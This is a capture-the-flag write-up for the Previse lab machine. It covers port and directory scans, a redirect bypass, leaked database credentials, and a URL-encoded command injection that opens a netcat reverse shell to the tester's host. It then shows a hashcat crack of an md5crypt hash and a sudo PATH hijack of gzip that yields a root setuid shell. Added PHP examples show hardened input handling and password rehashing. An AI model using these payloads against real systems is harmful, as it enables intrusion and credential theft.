Basic information

Port scan

22 and 80:

$ nmap -sC -sV 10.10.11.104

Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-11 15:01 CST
Nmap scan report for 10.10.11.104
Host is up (0.069s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.59 seconds

80

Directory scan

gobuster dir -u http://10.10.11.104/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -t 50

/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/download.php (Status: 302) [Size: 0] [--> login.php]
/favicon.ico (Status: 200) [Size: 15406]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/footer.php (Status: 200) [Size: 217]
/header.php (Status: 200) [Size: 980]
/index.php (Status: 302) [Size: 2801] [--> login.php]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/login.php (Status: 200) [Size: 2224]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/logs.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 277]
/status.php (Status: 302) [Size: 2966] [--> login.php]

accounts.php

Every request is redirected to login, but the Burp history shows that the page content is still returned in the response body and the browser simply follows the 302. Intercepting the response and modifying it gives normal access to the page:

files

Create an account, log in, and a backup file turns up under files:

siteBackup

Download and extract it and review the files: config gives the database password, and logs concatenates a request parameter straight into exec, which allows command injection:

config.php

<?php

function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}

?>

logs.php

<?php
session_start();
if (!isset($_SESSION['user'])) {
header('Location: login.php');
exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
header('Location: login.php');
exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";

if(file_exists($filepath)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filepath));
ob_clean(); // Discard data in the output buffer
flush(); // Flush system headers
readfile($filepath);
die();
} else {
http_response_code(404);
die();
}
?>
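For the defensive side of the two findings above (the redirect whose body can still be read, and the delim parameter reaching exec), here is a hardened rewrite of the logs.php handler. This is an added example, not the Previse site's own code. It assumes the same session key $_SESSION['user'], the same script path /opt/scripts/log_process.py taking a single delimiter argument, and the same output file /var/www/out.log; "comma" is the one delimiter value taken from the page, "space" and "tab" are assumed. It also corrects the original method check, whose `!$_SERVER['REQUEST_METHOD'] == 'POST'` negates the string before comparing and therefore never rejects anything.

```php
<?php
// Added example, not the Previse site's own code: a hardened rewrite of the
// logs.php handler. Assumed: $_SESSION['user'], /opt/scripts/log_process.py
// taking one delimiter argument, and /var/www/out.log as its output file.
// "comma" is the delimiter value seen on the page; "space" and "tab" are assumed.

declare(strict_types=1);

// Closed set of delimiter names the script understands. Anything else is
// rejected outright; no attempt is made to "clean" the input.
const ALLOWED_DELIMS = ['comma', 'space', 'tab'];

// Gate 1: authentication. The original emits the Location header and keeps
// running, which is why stripping the 302 in Burp exposed the page body.
// exit immediately so an anonymous client never receives a body at all.
function require_login(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['user'])) {
        header('Location: login.php', true, 302);
        exit;
    }
}

// Gate 2: method check. "!$_SERVER['REQUEST_METHOD'] == 'POST'" in the original
// negates the string first, so the branch never fires; compare explicitly.
function require_post(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit;
    }
}

// Builds the command line, or returns null for anything outside the allowlist.
// escapeshellarg() is defence in depth: even if the allowlist is widened later,
// the argument cannot break out of its single quotes and reach the shell parser.
function build_log_command(string $delim): ?string
{
    if (!in_array($delim, ALLOWED_DELIMS, true)) {
        return null;
    }
    return '/usr/bin/python /opt/scripts/log_process.py ' . escapeshellarg($delim);
}

// Streams the generated log file to the client with the same headers as the original.
function send_log_file(string $path): void
{
    if (!is_file($path)) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . (string) filesize($path));
    header('Cache-Control: must-revalidate');
    if (ob_get_level() > 0) {
        ob_end_clean(); // drop anything already buffered so the file is sent clean
    }
    readfile($path);
    exit;
}

require_login();
require_post();

$cmd = build_log_command((string) ($_POST['delim'] ?? ''));
if ($cmd === null) {
    http_response_code(400);
    exit('unsupported delimiter');
}

exec($cmd, $lines, $rc);
if ($rc !== 0) {
    http_response_code(500);
    exit('log processing failed');
}
send_log_file('/var/www/out.log');
```

The allowlist is the control that actually removes the injection: a delimiter is a closed set of names, so there is nothing to sanitize. The escaping is only there so that a later change to the list cannot silently reintroduce the bug. The `exit` after `header('Location: ...')` is what closes the accounts.php-style bypass; on its own the redirect header is advisory and the server still renders the rest of the script.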

Command injection

logs is the LOG DATA feature on the site; command injection there gives a shell:

comma;rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7C/bin/sh%20-i%202%3E%261%7Cnc%2010.10.14.7%204444%20%3E/tmp/f

mysql

Using the MySQL credentials obtained from config earlier to inspect the data gives the password hash of the m4lwhere account:

mysql> use previse
use previse
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts          |
| files             |
+-------------------+
2 rows in set (0.00 sec)

mysql> desc accounts;
desc accounts;
+------------+--------------+------+-----+-------------------+----------------+
| Field      | Type         | Null | Key | Default           | Extra          |
+------------+--------------+------+-----+-------------------+----------------+
| id         | int(11)      | NO   | PRI | NULL              | auto_increment |
| username   | varchar(50)  | NO   | UNI | NULL              |                |
| password   | varchar(255) | NO   |     | NULL              |                |
| created_at | datetime     | YES  |     | CURRENT_TIMESTAMP |                |
+------------+--------------+------+-----+-------------------+----------------+
4 rows in set (0.01 sec)

mysql> select username,password from accounts;
select username,password from accounts;
+----------+------------------------------------+
| username | password                           |
+----------+------------------------------------+
| m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. |
| miaomiao | $1$🧂llol$utY3ViR6xEFtKTaHwL.tn0 |
+----------+------------------------------------+
2 rows in set (0.00 sec)

mysql>

hash crack

The password cracks, but it sits around the middle of rockyou (about 51.68% of the way through), so it takes some time:

sudo hashcat -a 0 -m 500 hash.txt /usr/share/wordlists/rockyou.txt

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
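The reason the hash above fell to a plain rockyou run is the storage format: md5crypt (`$1$`) is cheap to compute, and both rows in the accounts table even share the same salt `🧂llol`. The login check below is an added example, not code from the Previse site, showing how such a site would verify the legacy hash once and replace it with bcrypt while the plaintext is legitimately in hand. It assumes the connectDB() helper from config.php and the accounts(id, username, password) table shown above; the form field names are assumed.

```php
<?php
// Added example, not code from the Previse site: verify a legacy md5crypt ($1$)
// hash and transparently upgrade it to bcrypt on successful login.
// Assumed: connectDB() from config.php and the accounts(id, username, password)
// table shown above.

declare(strict_types=1);

require_once __DIR__ . '/config.php';

const BCRYPT_OPTS = ['cost' => 12];

// A throw-away bcrypt hash that is verified when the user does not exist, so the
// response time does not reveal which usernames are valid.
function dummy_hash(): string
{
    static $h = null;
    return $h ??= password_hash('no-such-user', PASSWORD_BCRYPT, BCRYPT_OPTS);
}

// Returns true on a successful login and upgrades weak hashes as a side effect.
function verify_and_upgrade(mysqli $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT id, password FROM accounts WHERE username = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();

    if ($row === null) {
        password_verify($password, dummy_hash());
        return false;
    }

    // password_verify() runs crypt() with the stored hash as the salt string and
    // compares in constant time, so it accepts both $1$ (md5crypt) and $2y$ (bcrypt).
    if (!password_verify($password, $row['password'])) {
        return false;
    }

    // Anything that is not bcrypt at the current cost is rehashed now;
    // password_hash() generates a fresh random salt per user.
    if (password_needs_rehash($row['password'], PASSWORD_BCRYPT, BCRYPT_OPTS)) {
        $new = password_hash($password, PASSWORD_BCRYPT, BCRYPT_OPTS);
        $upd = $db->prepare('UPDATE accounts SET password = ? WHERE id = ?');
        $upd->bind_param('si', $new, $row['id']);
        $upd->execute();
    }
    return true;
}

// Usage (assumed form fields "username" and "password" on login.php):
// $ok = verify_and_upgrade(connectDB(), $_POST['username'] ?? '', $_POST['password'] ?? '');
```

Prepared statements are used for both queries so the username cannot alter the SQL, and the rehash step means a dump of the table after migration yields per-user-salted bcrypt hashes at cost 12 instead of the shared-salt md5crypt values that hashcat mode 500 handles so quickly.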

user flag

SSH in as m4lwhere to get user.txt:

m4lwhere : ilovecody112235!

Privilege escalation information

A script can be run with sudo; it calls gzip without an absolute path, so the call can be hijacked through the PATH environment variable:

Privilege escalation & root flag

m4lwhere@previse:/tmp$ nano gzip
m4lwhere@previse:/tmp$ cat gzip
#!/bin/bash
cp /bin/bash /tmp/b && chmod +s /tmp/b
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
m4lwhere@previse:/tmp$ ls -al b
-rwsr-sr-x 1 root root 1113504 Aug 11 08:11 b
m4lwhere@previse:/tmp$ ./b -p

References